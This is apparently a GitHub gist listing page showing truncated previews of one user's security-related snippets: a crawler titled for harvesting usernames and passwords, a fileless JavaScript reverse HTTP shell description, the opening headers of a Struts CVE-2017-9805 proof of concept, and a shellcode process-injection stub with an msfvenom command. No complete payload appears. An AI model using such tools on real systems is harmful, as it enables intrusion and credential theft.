Malayke /
Last active August 29, 2015 14:16
Crawl All Usernames And Passwords
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
# See documentation in:
import scrapy
Malayke /
Last active February 26, 2017 04:20
Colorful output M1(Mifare Classic) Card data from mfoc
#!/usr/bin/env python
# coding = utf-8
# Colorful print Mfoc data
# date: 2015-3-21 ,Nuruz
# changelog:
# 2017-2-26:
# change output colors to be similar to Mifare Classic Tools.
__author__ = 'Malayke'
Malayke / Preferences.sublime-settings
Created October 2, 2015 01:49
My ST3 configuration
"auto_complete_commit_on_tab": true,
"color_scheme": "Packages/Theme - Spacegray/base16-eighties.dark.tmTheme",
"enable_tab_scrolling": false,
"ensure_newline_at_eof_on_save": true,
Malayke / JSRat.ps1
Created March 11, 2016 04:47
Fileless JavaScript Reverse HTTP Shell
Author: Casey Smith @subTee
License: BSD3-Clause
Simple Reverse Shell over HTTP. Execute Commands on Client.
Most of the logic resides in establishes the beef object in the browser's DOM
window.onload then runs beef_init()
Within beef_init() we run
Within we gather response from beef.browser.getDetails()
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Malayke /
Last active December 13, 2017 10:49
Use Frida to get the class names of a hardened (packed) APK
import frida, sys
def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
jscode = """
Java.perform(function() {
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
Malayke /
Created September 9, 2018 05:02 — forked from milo2012/
Get Domains Belonging to Organization from
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
Malayke / NotCreateRemoteThread.c
Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =